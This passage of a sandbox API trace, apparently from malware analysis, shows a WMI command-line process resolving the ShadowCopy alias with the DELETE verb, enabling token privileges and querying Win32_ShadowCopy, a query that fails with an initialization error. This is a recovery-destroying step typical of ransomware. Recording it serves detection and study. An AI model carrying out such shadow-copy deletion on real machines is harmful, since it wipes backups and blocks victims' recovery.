(param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0151.362] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0151.362] malloc (_Size=0xc) returned 0x330ac80 [0151.362] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0151.362] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0151.362] malloc (_Size=0xc) returned 0x330aa28 [0151.362] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0151.362] SysStringLen (param_1="\"") returned 0x1 [0151.363] free (_Block=0x330ac80) [0151.363] free (_Block=0x330ac68) [0151.363] free (_Block=0x330ac38) [0151.363] free (_Block=0x330ac20) [0151.363] free (_Block=0x330acc8) [0151.363] free (_Block=0x330acb0) [0151.363] IWbemServices:GetObject (in: This=0x312a0e0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x2d0f524*=0x0, ppCallResult=0x0 | out: ppObject=0x2d0f524*=0x3137b80, ppCallResult=0x0) returned 0x0 [0151.483] malloc (_Size=0xc) returned 0x330ac20 [0151.484] IWbemClassObject:Get (in: This=0x3137b80, wszName="Text", lFlags=0, pVal=0x2d0f4ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d0f4ec*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31277f0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x3113fe0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0151.484] free (_Block=0x330ac20) [0151.484] SafeArrayGetLBound (in: psa=0x31277f0, nDim=0x1, plLbound=0x2d0f500 | out: plLbound=0x2d0f500) returned 0x0 [0151.484] SafeArrayGetUBound (in: psa=0x31277f0, nDim=0x1, plUbound=0x2d0f4fc | out: plUbound=0x2d0f4fc) returned 0x0 [0151.484] SafeArrayGetElement (in: psa=0x31277f0, rgIndices=0x2d0f518, pv=0x2d0f510 | out: pv=0x2d0f510) returned 0x0 [0151.484] malloc (_Size=0xc) returned 0x330ac20 [0151.484] malloc (_Size=0xc) returned 0x330ac80 [0151.484] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0151.484] free (_Block=0x330ac20) [0151.484] IUnknown:Release (This=0x3137b80) returned 0x0 [0151.485] free (_Block=0x330aa28) [0151.485] ??1CHString@@QAE@XZ () returned 0x1 [0151.485] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.485] free (_Block=0x330ac98) [0151.485] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.485] lstrlenW (lpString="Shadow copy management.") returned 23 [0151.485] malloc (_Size=0x30) returned 0x330b5f8 [0151.485] lstrlenW (lpString="Shadow copy management.") returned 23 [0151.485] free (_Block=0x330ac80) [0151.485] IUnknown:Release (This=0x3137380) returned 0x0 [0151.485] free (_Block=0x330ac50) [0151.485] ??1CHString@@QAE@XZ () returned 0x732365f8 [0151.485] lstrlenW (lpString="PATH") returned 4 [0151.485] lstrlenW (lpString="DELETE") returned 6 [0151.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0151.485] lstrlenW (lpString="WHERE") returned 5 [0151.485] lstrlenW (lpString="DELETE") returned 6 [0151.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0151.486] lstrlenW (lpString="(") returned 1 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0151.486] lstrlenW (lpString="/") returned 1 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0151.486] lstrlenW (lpString="-") returned 1 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0151.486] malloc (_Size=0xc) returned 0x330ac20 [0151.486] lstrlenW (lpString="GET") returned 3 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0151.486] lstrlenW (lpString="LIST") returned 4 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0151.486] lstrlenW (lpString="SET") returned 3 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0151.486] lstrlenW (lpString="CREATE") returned 6 [0151.486] lstrlenW (lpString="DELETE") returned 6 [0151.486] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0151.486] lstrlenW (lpString="CALL") returned 4 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0151.487] lstrlenW (lpString="ASSOC") returned 5 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0151.487] free (_Block=0x330ac20) [0151.487] lstrlenW (lpString="/") returned 1 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0151.487] lstrlenW (lpString="-") returned 1 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] malloc (_Size=0xe) returned 0x330ac20 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] lstrlenW (lpString="GET") returned 3 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.487] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0151.487] lstrlenW (lpString="LIST") returned 4 [0151.487] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0151.488] lstrlenW (lpString="SET") returned 3 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0151.488] lstrlenW (lpString="CREATE") returned 6 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0151.488] lstrlenW (lpString="CALL") returned 4 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0151.488] lstrlenW (lpString="ASSOC") returned 5 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] lstrlenW (lpString="DELETE") returned 6 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0151.488] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.488] malloc (_Size=0x3e) returned 0x330b630 [0151.488] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.488] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x7eca8843 | out: _String="Select", _Context=0x7eca8843) returned="Select" [0151.488] malloc (_Size=0xc) returned 0x330ac38 [0151.488] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca8843 | out: _String=0x0, _Context=0x7eca8843) returned="*" [0151.488] lstrlenW (lpString="FROM") returned 4 [0151.488] lstrlenW (lpString="*") returned 1 [0151.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0151.488] malloc (_Size=0xc) returned 0x330acb0 [0151.489] free (_Block=0x330ac38) [0151.489] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca8843 | out: _String=0x0, _Context=0x7eca8843) returned="from" [0151.489] lstrlenW (lpString="FROM") returned 4 [0151.489] lstrlenW (lpString="from") returned 4 [0151.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0151.489] malloc (_Size=0xc) returned 0x330ac50 [0151.489] free (_Block=0x330acb0) [0151.489] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca8843 | out: _String=0x0, _Context=0x7eca8843) returned="Win32_ShadowCopy" [0151.489] malloc (_Size=0xc) returned 0x330ac68 [0151.489] free (_Block=0x330ac50) [0151.489] free (_Block=0x330b630) [0151.489] free (_Block=0x330ac68) [0151.489] lstrlenW (lpString="SET") returned 3 [0151.489] lstrlenW (lpString="DELETE") returned 6 [0151.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0151.489] lstrlenW (lpString="CREATE") returned 6 [0151.489] lstrlenW (lpString="DELETE") returned 6 [0151.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0151.489] free (_Block=0x330ade8) [0151.489] malloc (_Size=0x4) returned 0x330ade8 [0151.489] lstrlenW (lpString="GET") returned 3 [0151.489] lstrlenW (lpString="DELETE") returned 6 [0151.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0151.490] lstrlenW (lpString="LIST") returned 4 [0151.490] lstrlenW (lpString="DELETE") returned 6 [0151.490] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0151.490] lstrlenW (lpString="ASSOC") returned 5 [0151.490] lstrlenW (lpString="DELETE") returned 6 [0151.490] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0151.490] WbemLocator:IUnknown:AddRef (This=0x30f3d70) returned 0x3 [0151.490] free (_Block=0x3302688) [0151.490] lstrlenW (lpString="") returned 0 [0151.490] lstrlenW (lpString="NQDPDE") returned 6 [0151.490] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0151.490] lstrlenW (lpString="NQDPDE") returned 6 [0151.490] malloc (_Size=0xe) returned 0x330acb0 [0151.490] lstrlenW (lpString="NQDPDE") returned 6 [0151.490] GetCurrentThreadId () returned 0xafc [0151.490] GetCurrentProcess () returned 0xffffffff [0151.490] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2d0f6a4 | out: TokenHandle=0x2d0f6a4*=0x2f8) returned 1 [0151.490] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2d0f6a0 | out: TokenInformation=0x0, ReturnLength=0x2d0f6a0) returned 0 [0151.490] malloc (_Size=0x118) returned 0x330b630 [0151.490] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x330b630, TokenInformationLength=0x118, ReturnLength=0x2d0f6a0 | out: TokenInformation=0x330b630, ReturnLength=0x2d0f6a0) returned 1 [0151.490] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x330b630*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0151.490] free (_Block=0x330b630) [0151.490] CloseHandle (hObject=0x2f8) returned 1 [0151.491] lstrlenW (lpString="GET") returned 3 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0151.491] lstrlenW (lpString="LIST") returned 4 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0151.491] lstrlenW (lpString="SET") returned 3 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0151.491] lstrlenW (lpString="CALL") returned 4 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0151.491] lstrlenW (lpString="ASSOC") returned 5 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0151.491] lstrlenW (lpString="CREATE") returned 6 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] lstrlenW (lpString="DELETE") returned 6 [0151.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0151.491] malloc (_Size=0xc) returned 0x330ac38 [0151.491] lstrlenA (lpString="") returned 0 [0151.491] malloc (_Size=0x2) returned 0x3302688 [0151.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf2b74, cbMultiByte=-1, lpWideCharStr=0x3302688, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0151.491] free (_Block=0x3302688) [0151.491] malloc (_Size=0xc) returned 0x330ac68 [0151.491] lstrlenA (lpString="") returned 0 [0151.491] malloc (_Size=0x2) returned 0x3302688 [0151.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf2b74, cbMultiByte=-1, lpWideCharStr=0x3302688, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0151.492] free (_Block=0x3302688) [0151.492] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.492] malloc (_Size=0x3e) returned 0x330b630 [0151.492] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0151.492] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x7eca88bb | out: _String="Select", _Context=0x7eca88bb) returned="Select" [0151.492] malloc (_Size=0xc) returned 0x330ac98 [0151.492] free (_Block=0x330ac68) [0151.492] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca88bb | out: _String=0x0, _Context=0x7eca88bb) returned="*" [0151.492] lstrlenW (lpString="FROM") returned 4 [0151.492] lstrlenW (lpString="*") returned 1 [0151.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0151.492] malloc (_Size=0xc) returned 0x330acc8 [0151.492] free (_Block=0x330ac98) [0151.492] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca88bb | out: _String=0x0, _Context=0x7eca88bb) returned="from" [0151.492] lstrlenW (lpString="FROM") returned 4 [0151.492] lstrlenW (lpString="from") returned 4 [0151.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0151.492] malloc (_Size=0xc) returned 0x330ac50 [0151.492] free (_Block=0x330acc8) [0151.492] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7eca88bb | out: _String=0x0, _Context=0x7eca88bb) returned="Win32_ShadowCopy" [0151.492] malloc (_Size=0xc) returned 0x330ac68 [0151.492] free (_Block=0x330ac50) [0151.492] free (_Block=0x330b630) [0151.492] malloc (_Size=0xc) returned 0x330ac50 [0151.494] malloc (_Size=0xc) returned 0x330ac80 [0151.494] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0151.494] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0151.494] free (_Block=0x330ac38) [0151.494] free (_Block=0x330ac50) [0151.494] ??0CHString@@QAE@XZ () returned 0x2d0f644 [0151.494] GetCurrentThreadId () returned 0xafc [0151.494] malloc (_Size=0xc) returned 0x330ac98 [0151.494] malloc (_Size=0xc) returned 0x330acc8 [0151.494] malloc (_Size=0xc) returned 0x330ac38 [0151.494] malloc (_Size=0xc) returned 0x330ac50 [0151.494] malloc (_Size=0xc) returned 0x330aa28 [0151.494] SysStringLen (param_1="\\\\") returned 0x2 [0151.494] SysStringLen (param_1="NQDPDE") returned 0x6 [0151.494] malloc (_Size=0xc) returned 0x330aa88 [0151.494] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0151.495] SysStringLen (param_1="\\") returned 0x1 [0151.495] malloc (_Size=0xc) returned 0x330aaa0 [0151.495] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0151.495] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0151.495] free (_Block=0x330aa88) [0151.495] free (_Block=0x330aa28) [0151.495] free (_Block=0x330ac50) [0151.495] free (_Block=0x330ac38) [0151.495] free (_Block=0x330acc8) [0151.495] free (_Block=0x330ac98) [0151.495] malloc (_Size=0xc) returned 0x330ac98 [0151.495] malloc (_Size=0xc) returned 0x330ac38 [0151.495] malloc (_Size=0xc) returned 0x330acc8 [0151.495] WbemLocator:IWbemLocator:ConnectServer (in: This=0x30f3d70, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x138564 | out: ppNamespace=0x138564*=0x312a2c0) returned 0x0 [0152.616] free (_Block=0x330acc8) [0152.616] free (_Block=0x330ac38) [0152.616] free (_Block=0x330ac98) [0152.616] CoSetProxyBlanket (pProxy=0x312a2c0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0152.616] free (_Block=0x330aaa0) [0152.616] ??1CHString@@QAE@XZ () returned 0x732365f8 [0152.616] ??0CHString@@QAE@XZ () returned 0x2d0f634 [0152.616] GetCurrentThreadId () returned 0xafc [0152.616] malloc (_Size=0xc) returned 0x330aa28 [0152.616] lstrlenA (lpString="") returned 0 [0152.616] malloc (_Size=0x2) returned 0x3302688 [0152.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf2b74, cbMultiByte=-1, lpWideCharStr=0x3302688, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0152.617] free (_Block=0x3302688) [0152.617] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0152.617] SysStringLen (param_1="") returned 0x0 [0152.617] free (_Block=0x330aa28) [0152.617] malloc (_Size=0xc) returned 0x330aa28 [0152.617] IWbemServices:ExecQuery (in: This=0x312a2c0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x2d0f630 | out: ppEnum=0x2d0f630*=0x0) returned 0x80041014 [0161.113] free (_Block=0x330aa28) [0161.122] _CxxThrowException () [0161.124] malloc (_Size=0x10) returned 0x330aa88 [0161.124] ??1CHString@@QAE@XZ () returned 0x732365f8 [0161.124] free (_Block=0x330ac68) [0161.124] free (_Block=0x330ac80) [0161.124] GetCurrentThreadId () returned 0xafc [0161.124] ??0CHString@@QAE@PBG@Z () returned 0x2d0f6d4 [0161.125] ??YCHString@@QAEABV0@PBG@Z () returned 0x2d0f6d4 [0161.126] ??0CHString@@QAE@XZ () returned 0x2d0f5a0 [0161.126] malloc (_Size=0xc) returned 0x330ac38 [0161.126] malloc (_Size=0xc) returned 0x330ac50 [0161.126] SysStringLen (param_1="") returned 0x0 [0161.126] free (_Block=0x330ac38) [0161.126] CoCreateInstance (in: rclsid=0xf6a14*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xf6a24*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x13857c | out: ppv=0x13857c*=0x31140b0) returned 0x0 [0161.134] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x31140b0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x2d0f5a4 | out: MessageText=0x2d0f5a4*="Initialization failure\r\n") returned 0x0 [0161.135] free (_Block=0x330ac50) [0161.135] malloc (_Size=0xc) returned 0x330ac38 [0161.136] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x31140b0, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x2d0f5a8 | out: MessageText=0x2d0f5a8*="WMI") returned 0x0 [0161.136] malloc (_Size=0xc) returned 0x330ac80 [0161.137] lstrlenW (lpString="WMI") returned 3 [0161.137] lstrlenW (lpString="Wbem") returned 4 [0161.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0161.137] lstrlenW (lpString="WMI") returned 3 [0161.137] lstrlenW (lpString="WMI") returned 3 [0161.137] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0161.137] WbemStatusCodeText:IUnknown:Release (This=0x31140b0) returned 0x0 [0161.137] ??1CHString@@QAE@XZ () returned 0x732365f8 [0161.137] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x2d0ee00, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0161.137] FormatMessageW (in: dwFlags=0x2500, lpSource=0x2d0ee00, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x2d0ede8, nSize=0x0, Arguments=0x2d0edec | out: lpBuffer="紀̒燤̑") returned 0x2e [0161.137] malloc (_Size=0xc) returned 0x330acc8 [0161.137] LocalFree (hMem=0x3127d00) returned 0x0 [0161.138] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0161.138] malloc (_Size=0x2f) returned 0x330b730 [0161.138] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x330b730, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0161.138] __iob_func () returned 0x776f2608 [0161.138] fprintf (in: _File=0x776f2648, _Format="%s" | out: _File=0x776f2648) returned 46 [0161.155] __iob_func () returned 0x776f2608 [0161.155] fflush (in: _File=0x776f2648 | out: _File=0x776f2648) returned 0 [0161.155] free (_Block=0x330b730) [0161.155] free (_Block=0x330acc8) [0161.155] free (_Block=0x330ac80) [0161.155] free (_Block=0x330ac38) [0161.155] ??1CHString@@QAE@XZ () returned 0x1 [0161.155] ??0CHString@@QAE@PBG@Z () returned 0x2d0f6dc [0161.155] ??YCHString@@QAEABV0@PBG@Z () returned 0x2d0f6dc [0161.155] GetCurrentThreadId () returned 0xafc [0161.155] ??1CHString@@QAE@XZ () returned 0x1 [0161.155] WbemLocator:IUnknown:Release (This=0x312a2c0) returned 0x0 [0161.156] ?Empty@CHString@@QAEXXZ () returned 0x732365f8 [0161.157] free (_Block=0x330aa88) [0161.157] _kbhit () returned 0x0 [0161.158] free (_Block=0x330ade8) [0161.158] free (_Block=0x330a938) [0161.158] free (_Block=0x330a9e0) [0161.158] free (_Block=0x330a920) [0161.158] free (_Block=0x330a9c8) [0161.158] free (_Block=0x3300568) [0161.158] free (_Block=0x33029b0) [0161.158] free (_Block=0x330b5f8) [0161.158] free (_Block=0x330ac20) [0161.158] free (_Block=0x330b578) [0161.158] free (_Block=0x330ac08) [0161.158] free (_Block=0x3302990) [0161.158] free (_Block=0x330b5e8) [0161.158] free (_Block=0x3300520) [0161.158] free (_Block=0x330b5c0) [0161.158] ?Empty@CHString@@QAEXXZ () returned 0x732365f8 [0161.158] free (_Block=0x330adb0) [0161.158] free (_Block=0x3302b30) [0161.158] free (_Block=0x330abd8) [0161.158] free (_Block=0x3302588) [0161.158] free (_Block=0x33025d0) [0161.158] free (_Block=0x3302618) [0161.159] free (_Block=0x330acb0) [0161.159] free (_Block=0x33026c8) [0161.159] free (_Block=0x3300508) [0161.159] free (_Block=0x33029f0) [0161.159] free (_Block=0x33004f0) [0161.159] free (_Block=0x3302bf0) [0161.159] free (_Block=0x33004d8) [0161.159] free (_Block=0x33029d0) [0161.159] free (_Block=0x33027f8) [0161.159] free (_Block=0x3302810) [0161.159] free (_Block=0x33027c0) [0161.159] free (_Block=0x33027d8) [0161.159] free (_Block=0x3302830) [0161.159] free (_Block=0x3302848) [0161.159] free (_Block=0x33004a0) [0161.159] free (_Block=0x33004b8) [0161.159] free (_Block=0x3302750) [0161.159] free (_Block=0x3302768) [0161.159] free (_Block=0x3302718) [0161.159] free (_Block=0x3302730) [0161.160] free (_Block=0x3302788) [0161.160] free (_Block=0x33027a0) [0161.160] free 